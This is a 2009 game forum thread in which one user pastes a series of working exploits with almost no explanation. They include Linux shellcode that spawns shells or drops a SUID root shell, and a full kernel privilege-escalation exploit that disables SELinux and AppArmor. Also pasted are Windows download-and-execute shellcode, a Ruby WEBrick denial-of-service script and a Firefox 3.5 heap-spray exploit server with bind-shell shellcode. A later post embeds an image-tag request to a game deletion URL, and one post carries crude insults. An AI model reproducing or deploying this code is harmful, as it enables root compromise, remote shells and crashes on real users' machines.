Forumwarz is the first "Massively Single-Player" online RPG completely built around Internet culture.
You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.
You need to be logged in to post and to see the uncensored versions of these forums.
Bored, posting random exploits
|
|||||||
|---|---|---|---|---|---|---|---|
|
char code[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)code;
}
|
||||||
| Posted On: 07/17/2009 12:03PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
  |
||||||
|
char code[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
main() {
void (*a)() = (void *)code;
int i;
printf("size: %d bytes\n", strlen(code));
printf("Testing for cntrl characters.. ");
for(i=0;i<strlen(code);i++)
if(iscntrl(code[i])) printf("FAILED\n"), exit(255);
printf("PbumED\n");
a();
}
|
||||||
| Posted On: 07/17/2009 12:05PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
/*
linux/x86 (shamelessly ripped from one of my unpublished exploits)
*/
/*
fork()'s, does setreuid(0, 0); then execve()'s:
/bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh"
hence dropping a SUID root shell in /tmp.
*/
char shellc[] = /* anathema <anathema@hack.co.za> */
/* Shellcode to drop a SUID root shell in /tmp/sh.
Forgive the Intel syntax in the commenting, bored with AT&T syntax..
*/
/* main: if (fork()) goto exeunt; else goto carryon; */
"\x29\xc0" /* sub ax, ax */
"\xb0\x02" /* mov al, 2 */
"\xcd\x80" /* int 0x80 */
"\x85\xc0" /* test ax, ax */
"\x75\x02" /* jnz exeunt */
"\xeb\x05" /* jmp carryon */
/* exeunt: exit(x); */
"\x29\xc0" /* sub ax, ax */
"\x40" /* inc ax */
"\xcd\x80" /* int 0x80 */
/* carryon: setreuid(0, 0); goto callz; */
"\x29\xc0" /* sub ax, ax */
"\x29\xdb" /* sub bx, bx */
"\x29\xc9" /* sub cx, cx */
"\xb0\x46" /* mov al, 0x46 */
"\xcd\x80" /* int 0x80 */
"\xeb\x2a" /* jmp callz */
/* start: execve() */
"\x5e" /* pop si */
"\x89\x76\x32" /* mov [bp+0x32], si */
"\x8d\x5e\x08" /* lea bx, [bp+0x08] */
"\x89\x5e\x36" /* mov [bp+0x36], bx */
"\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */
"\x89\x5e\x3a" /* mov [bp+0x3a], bx */
"\x29\xc0" /* sub ax, ax */
"\x88\x46\x07" /* mov [bp+0x07], al */
"\x88\x46\x0a" /* mov [bp+0x0a], al */
"\x88\x46\x31" /* mov [bp+0x31], al */
"\x89\x46\x3e" /* mov [bp+0x3e], ax */
"\x87\xf3" /* xchg si, bx */
"\xb0\x0b" /* mov al, 0x0b */
"\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */
"\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */
"\xcd\x80" /* int 0x80 */
/* callz: call start */
"\xe8\xd1\xff\xff\xff" /* call start */
/* data - command to execve() */
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f"
"\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34"
"\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68";
/** test out the shellcode **/
main ()
{
void (*sc)() = (void *)shellc; sc();
}
|
||||||
| Posted On: 07/17/2009 12:05PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
Now a really recent one:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <poll.h>
#include <sys/personality.h>
#ifdef RHEL5_SUCKS
#define OFFSET_OF_FLAGS 0x4
#else
#define OFFSET_OF_FLAGS 0x8
#endif
struct sock {
char gibberish1[0x60];
#ifdef RHEL5_SUCKS
char gibberish2[0xb0]; // this seems to do the trick ;)
#else
char gibberish2[0xe0]; // gotta make sure this >> 1 is not >= above
#endif
unsigned long gibberish3[0x50];
};
static void craft_sock(struct sock *sk, unsigned long target_addr)
{
int i;
memset(sk->gibberish1, 0, sizeof(sk->gibberish1));
memset(sk->gibberish2, 0, sizeof(sk->gibberish2));
for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++)
sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS;
}
static void or_one_to_kernel_address(unsigned long target_addr)
{
struct sock *sk = NULL;
int fd;
struct pollfd pfd;
craft_sock(sk, target_addr);
fd = open("/dev/net/tun", O_RDWR);
if (fd == -1) {
fprintf(stdout, "UNABLE TO OPEN /dev/net/tun!\n");
return;
}
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
close(fd);
fprintf(stdout, " [+] *%p |= 1\n", (void *)target_addr);
}
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
/* fastcalls! */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef int __attribute__((regparm(3))) (*_nf_unregister_hooks)(unsigned long *ops, int count);
typedef int __attribute__((regparm(3))) (*_unregister_filesystem)(unsigned long arg);
unsigned long *tun_mmap_fop;
unsigned long sel_fs_type;
unsigned long *mmap_min_addr;
int *audit_enabled;
int *ss_initialized;
int *selinux_enforcing;
int *selinux_enabled;
int *selinux_mls_enabled;
int *sel_enforce_ptr;
int *apparmor_enabled;
int *apparmor_logsyscall;
int *apparmor_audit;
int *apparmor_complain;
unsigned long *security_ops;
unsigned long default_security_ops;
unsigned long sel_read_bool;
unsigned long security_get_bool_value;
unsigned long sel_read_enforce;
_commit_creds commit_creds;
unsigned long init_cred;
_nf_unregister_hooks nf_unregister_hooks;
unsigned long * selinux_ipv4_ops;
unsigned long * selinux_ipv6_ops;
_unregister_filesystem unregister_filesystem;
int what_we_do;
unsigned int our_uid;
int got_root;
/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
unsigned long current;
asm volatile (
" movl %%esp, %%eax;"
" andl %1, %%eax;"
" movl (%%eax), %0;"
: "=r" (current)
: "i" (0xfffff000)
);
return current;
}
static void old_style_gimme_root(void)
{
unsigned int *current;
unsigned long orig_current;
current = (unsigned int *)get_current();
orig_current = (unsigned long)current;
while (((unsigned long)current < (orig_current + 0x1000)) &&
(current[0] != our_uid || current[1] != our_uid ||
current[2] != our_uid || current[3] != our_uid))
current++;
if ((unsigned long)current >= (orig_current + 0x1000))
return;
current[0] = current[1] = current[2] = current[3] = 0; // uids
current[4] = current[5] = current[6] = current[7] = 0; // gids
got_root = 1;
return;
}
static int __attribute__((regparm(3))) own_the_kernel(void *a, void *b)
{
// clean up after ourselves ;)
if (tun_mmap_fop)
*tun_mmap_fop = 0;
if (audit_enabled)
*audit_enabled = 0;
// giggles
//if (mmap_min_addr)
// *mmap_min_addr = 0;
// disable apparmor
if (apparmor_enabled && *apparmor_enabled) {
what_we_do = 1;
*apparmor_enabled = 0;
if (apparmor_audit)
*apparmor_audit = 0;
if (apparmor_logsyscall)
*apparmor_logsyscall = 0;
if (apparmor_complain)
*apparmor_complain = 0;
}
// disable SELinux
if (selinux_enforcing && *selinux_enforcing) {
what_we_do = 2;
*selinux_enforcing = 0;
}
if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) {
// trash LSM
if (default_security_ops && security_ops) {
if (*security_ops != default_security_ops)
what_we_do = 3;
*security_ops = default_security_ops;
}
}
/* make the idiots think selinux is enforcing */
if (sel_read_enforce || (sel_read_bool && security_get_bool_value)) {
unsigned char *p;
unsigned long _cr0;
asm volatile (
"mov %%cr0, %0"
: "=r" (_cr0)
);
_cr0 &= ~0x10000;
asm volatile (
"mov %0, %%cr0"
:
: "r" (_cr0)
);
if (sel_read_enforce) {
if (sizeof(unsigned int) != sizeof(unsigned long)) {
/* 64bit version, look for the mov ecx, [rip+off]
and replace with mov ecx, 1
*/
for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
if (p[0] == 0x8b && p[1] == 0x0d) {
p[0] = '\xb9';
p[5] = '\x90';
*(unsigned int *)&p[1] = 1;
goto and_now;
}
}
} else {
/* 32bit, replace push [selinux_enforcing] with push 1 */
for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
if (p[0] == 0xff && p[1] == 0x35) {
#ifdef RHEL5_SUCKS
// while we're at it, disable
// SELinux without having a
// symbol for selinux_enforcing ;)
sel_enforce_ptr = *(unsigned int **)&p[2];
*sel_enforce_ptr = 0;
what_we_do = 2;
#endif
p[0] = '\x68';
p[5] = '\x90';
*(unsigned int *)&p[1] = 1;
goto and_now;
}
}
}
}
and_now:
/*
if (sel_read_bool && security_get_bool_value) {
for (p = (unsigned char *)sel_read_bool; (unsigned long)p < (sel_read_bool + 0x300); p++) {
if (p[0] == 0xe8 && (((unsigned long)&p[5] + *(int *)&p[1]) == security_get_bool_value)) {
*p = '\xa1';
*(unsigned int *)(p + 1) = 1;
goto next_part;
}
}
}
next_part:
*/
_cr0 |= 0x10000;
asm volatile (
"mov %0, %%cr0"
:
: "r" (_cr0)
);
}
/*
if (nf_unregister_hooks) {
if (selinux_ipv4_ops && *selinux_ipv4_ops) {
nf_unregister_hooks(selinux_ipv4_ops, 3);
*selinux_ipv4_ops = 0;
}
if (selinux_ipv6_ops && *selinux_ipv6_ops) {
nf_unregister_hooks(selinux_ipv6_ops, 2);
*selinux_ipv6_ops = 0;
}
}
*/
//if (unregister_filesystem && sel_fs_type)
// unregister_filesystem(sel_fs_type);
/* and now give ourselves full privileges */
if (commit_creds && init_cred) {
/* hackish usage increment */
*(volatile int *)(init_cred) += 1;
commit_creds(init_cred);
got_root = 1;
}
#ifdef RHEL5_SUCKS
else {
// must be RHEL5 2.6.18
old_style_gimme_root();
}
#endif
return -1;
}
static void boom_goes_the_dynamite(void)
{
char *mem;
int fd;
fprintf(stdout, " [+] b00m!\n");
fd = open("/dev/net/tun", O_RDONLY);
mem = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);
close(fd);
return;
}
int pa__init(void *m)
{
char *mem;
int fd;
int ret;
our_uid = getuid();
/* open it so we can have it auto-loaded and resolve its symbols
below
*/
fd = open("/dev/net/tun", O_RDONLY);
if (fd == -1) {
fprintf(stdout, "UNABLE TO OPEN THE DEVICE!\n");
return 1;
}
close(fd);
if ((personality(0xffffffff)) != PER_SVR4) {
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem != NULL) {
fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
return 1;
}
} else {
ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
if (ret == -1) {
fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
return 1;
}
}
fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");
/* make an mmap handler for the tun device at 0x1
mmap fop offset is sizeof(ptr) * 11
*/
tun_mmap_fop = (unsigned long *)(get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11));
selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
//selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
//selinux_mls_enabled = (int *)get_kernel_sym("selinux_mls_enabled");
//ss_initialized = (int *)get_kernel_sym("ss_initialized");
apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
nf_unregister_hooks = (_nf_unregister_hooks)get_kernel_sym("nf_unregister_hooks");
//selinux_ipv4_ops = (unsigned long *)get_kernel_sym("selinux_ipv4_ops");
//selinux_ipv6_ops = (unsigned long *)get_kernel_sym("selinux_ipv6_ops");
security_ops = (unsigned long *)get_kernel_sym("security_ops");
default_security_ops = get_kernel_sym("default_security_ops");
//sel_read_bool = get_kernel_sym("sel_read_bool");
sel_read_enforce = get_kernel_sym("sel_read_enforce");
//security_get_bool_value = get_kernel_sym("security_get_bool_value");
//mmap_min_addr = (unsigned long *)get_kernel_sym("mmap_min_addr");
audit_enabled = (int *)get_kernel_sym("audit_enabled");
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
init_cred = get_kernel_sym("init_cred");
//sel_fs_type = get_kernel_sym("sel_fs_type");
//unregister_filesystem = (_unregister_filesystem)get_kernel_sym("unregister_filesystem");
or_one_to_kernel_address((unsigned long)tun_mmap_fop);
/* two cases, fancy trickery */
if (sizeof(unsigned int) != sizeof(unsigned long)) {
// 64bit
*(char *)1 = '\xff';
*(char *)2 = '\x25';
*(unsigned int *)3 = 0; // pc-relative and such yes ;)
*(unsigned long *)(3 + 4) = (unsigned long)&own_the_kernel;
} else {
// 32bit
*(char *)1 = '\xe9';
*(unsigned long *)2 = (unsigned long)&own_the_kernel - 6;
}
boom_goes_the_dynamite();
{
char *msg;
switch (what_we_do) {
case 1:
msg = "AppArmor";
break;
case 2:
msg = "SELinux";
break;
case 3:
msg = "LSM";
break;
default:
msg = "nothing, what an insecure machine!";
}
fprintf(stdout, " [+] Disabled security of : %s\n", msg);
}
if (got_root == 1)
fprintf(stdout, " [+] Got root!\n");
else {
fprintf(stdout, " [+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?\n");
exit(0);
}
fprintf(stdout, " [+] BAM! About to launch your rootshell!...but first some chit-chat...\n");
sleep(3);
fprintf(stdout, " , ,\n");
fprintf(stdout, " /(_, ,_)\\\n");
fprintf(stdout, " \\ _/ \\_ /\n");
fprintf(stdout, " // \\\\\n");
fprintf(stdout, " \\\\ (@)(@) //\n");
fprintf(stdout, " \\'=\"==\"='/\n");
fprintf(stdout, " ,===/ \\===,\n");
fprintf(stdout, " \",===\\ /===,\"\n");
fprintf(stdout, " \" ,==='------'===, \"\n");
fprintf(stdout, " \" \"\n");
fprintf(stdout, "Do you know the deadliest catch?\n");
{
char buf[20];
fgets(buf, sizeof(buf)-1, stdin);
}
sleep(1);
fprintf(stdout, "That's right! MAN is the deadliest catch of all!\n");
sleep(2);
{
char wait[] = "WAIIIIIIIIIITTTT....";
int i;
for (i = 0; i < sizeof(wait); i++) {
fprintf(stdout, "%c", wait[i]);
fflush(stdout);
usleep(200 * 1000);
}
}
fprintf(stdout, "do you hear it?\n");
sleep(2);
fprintf(stdout, "You hear it! You do too! It's not just me! It's here, it's here I say!!\n");
sleep(3);
fprintf(stdout, "I must face this....\n");
fprintf(stdout, "\x7");
fflush(stdout);
sleep(1);
fprintf(stdout, "\x7");
fflush(stdout);
sleep(1);
fprintf(stdout, "\x7");
fflush(stdout);
sleep(1);
fprintf(stdout, "What's this? Something stirs within the beast's belly! Something unexpected");
fflush(stdout);
usleep(500 * 1000);
fprintf(stdout, ".");
fflush(stdout);
usleep(500 * 1000);
fprintf(stdout, ".");
fflush(stdout);
usleep(500 * 1000);
fprintf(stdout, ".");
fflush(stdout);
usleep(500 * 1000);
fprintf(stdout, ".");
fflush(stdout);
usleep(500 * 1000);
fprintf(stdout, "\n");
sleep(3);
execl("/bin/sh", "/bin/sh", "-i", NULL);
return 0;
}
void pa__done(void *m)
{
return;
}
int main(void)
{
pa__init(NULL);
}
quantumenergy edited this message on 07/17/2009 12:13PM
|
||||||
| Posted On: 07/17/2009 12:13PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
This **** works on Windows:
.386
.model flat,stdcall
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
bumume fs:nothing
code_start:
jmp load_data
IFDEF TEST_CODE
extern URLDownloadToFileA :proc
call URLDownloadToFileA ; included when bumembled with /DTEST_CODE
ENDIF
setup_parameters:
pop edi ; offset @cmd_start
xor eax,eax ; eax = 0
cdq ; edx = 0
; ********************************************************************
push eax ; exit code = 0
; ********************************************************************
push eax ; SW_HIDE
mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes
push edi ; file name to execute
; ********************************************************************
push eax ; callback routine URLDownLoadToFileA
push eax ; reserved, must be zero
push edi ; file name to save as
add edi,edx ; get offset of @url_start-1
stosb ; zero tail end
mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url
push edi ; url to download file from
push eax ; interface
add edi,edx ; get offset of @urlmon-1
stosb ; zero tail end of url
; *********************************************************************
load_modules:
push edi ; save current offset to hashes
push 30h
pop ecx
mov eax,fs:[ecx] ; PEB base address
mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData
mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList
scan_dll:
mov ebx,[ebp+8] ; DllBase
mov ebp,[ebp] ; Flink
push ebp ; save
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT
lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax,ecx ; ecx = NumberOfNames
lodsd
add eax,ebx ; AddressOfFunctions
push eax
lodsd
lea edi,[eax+ebx] ; AddressOfNames
lodsd
lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals
load_api:
mov esi,[edi+4*ecx-4]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api
mov esi,[esp+8] ; get api hashes
cmp dx,word ptr[esi] ; found a match?
je call_api
loop load_api
pop eax ; check
pop ebp ;
jmp scan_dll
call_api:
pop eax
movzx edx,word ptr [ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop ebp ; modules
pop edi ; api hashes
call ebx ; call api
stosw ; advance 2 bytes to next hash
jmp load_modules ; do another, just keep going until ExitProcess is reached.
; *************************
load_data:
call setup_parameters
@cmd_start:
db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);
@cmd_end:
@url_start:
db 'http://127.0.0.1/file.exe',0ffh ; url of file to download
@url_end:
hashapi <URLDownloadToFileA>
hashapi <WinExec>
hashapi <ExitProcess>
; *********************************************************************
end code_start
|
||||||
| Posted On: 07/17/2009 12:18PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
This thing might work on Forumwarz:
-------------------------------------------------------
Language : Ruby
Web Site: www.ruby-lang.org
Platform: All
Bug: Remote Socket Memory Leak
Products Affected:
1.8 series:
- 1.8.5 and all prior versions
- 1.8.6-p286 and all prior versions
- 1.8.7-p71 and all prior versions
1.9 series
- r18423 and all prior revisions
Confirmed by the vendor: Yes
Patch available : Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===============
1) Introduction
===============
"A dynamic, open source programming language with a focus on simplicity and productivity.
It has an elegant syntax that is natural to read and easy to write."
=======
2) Bug
=======
Ruby fails to handle properly the memory allocated for a socket
So when you send ~ 4 big request to a ruby socket, ruby will go
in infinite loop, and then crash.
The bug reside in the regex engine (in regex.c).
==================
3)Proof of concept
===================
This poc is an exemple for Webrick web server
crap.pl :
#!/usr/bin/perl
use LWP::Simple;
my $payload = "\x41" x 49999999;
while(1)
{
print "[+]\n";
get "http://127.0.0.1:2500/".$payload."";
}
Result (Exemple on Webrick web server):
[2008-07-11 22:39:55] INFO WEBrick 1.3.1
[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux]
[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500
[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory
/usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line'
/usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse'
/usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'
/home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch'
script/server:62
[FATAL] failed to allocate memory
root@audit:/home/audit#
=====
5)Credits
=====
laurent gaffiƩ
laurent.gaffie{remove_this}[at]gmail[dot]com
# milw0rm.com [2008-08-13]
|
||||||
| Posted On: 07/17/2009 12:29PM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
If you’re running Firefox you’re at risk:
#!/usr/bin/env python
#######################################################
#
# FireFox 3.5 Heap Spray Exploit
# Originally discovered by: Simon Berry-Bryne
# Pythonized by: David Kennedy (ReL1K) @ SecureState
#
#######################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
clbum myRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Exploit
</br>
Discovered by: SBerry aka Simon Berry-Byrne
Pythonized: David Kennedy (ReL1K) at SecureState
Bind Shell Port: 5500
Encoding: Shikata_Ga_Nai
</br>
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Ihazacrashihazacrash</FONT></p>
<p>
<FONT>Ohnoesihazacrashhazcrash</FONT>
</p>
<p>
<FONT>Aaaaahhhhh </FONT>
</p>
</div>
<script language=JavaScript>
// windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" +
"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" +
"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" +
"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" +
"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" +
"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" +
"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" +
"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" +
"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" +
"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" +
"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" +
"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = dogreat timesent.getElementById("content")
if (dogreat timesent.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target))
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
#######################################################
#
# FireFox 3.5 Heap Spray
# Originally discovered by: Simon Berry-Bryne
# Pythonized: David Kennedy (ReL1K) @ SecureState
#
#######################################################
""")
print ("Listening on port 80.")
print ("Have someone connect to you.")
print ("\nType <control>-c to exit..")
try:
httpd.handle_request()
httpd.serve_forever()
except KeyboardInterrupt:
print ("\n\nExiting exploit...\n\n")
sys.exit(1)
# milw0rm.com [2009-07-17]
|
||||||
| Posted On: 07/18/2009 6:21AM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
|
AIDS CUNT edited this message on 04/28/2010 7:31AM
I'M A SIG-DISABLING COCKMONGLER
|
||||||
| Posted On: 07/18/2009 8:59AM |
Rate this Post: 0
AIDS woman's genitals
|
#
|
||||||
|
as soon as I find the time I’ll read them all trough |
||||||
| Posted On: 07/18/2009 9:38AM |
Rate this Post: 0
View Stoneythestoner's Profile
|
#
|
||||||
|
robots are invading my house! |
||||||
| Posted On: 07/24/2009 2:04AM |
Rate this Post: 0
View Inertia's Profile
|
#
|
||||||
|
This exploit used to cause Trout nightmares: [img]http://www.forumwarz.com/klans/delete_klan[/img] |
||||||
| Posted On: 07/27/2009 2:42AM |
Rate this Post: 0
View quantumenergy's Profile
|
#
|
||||||
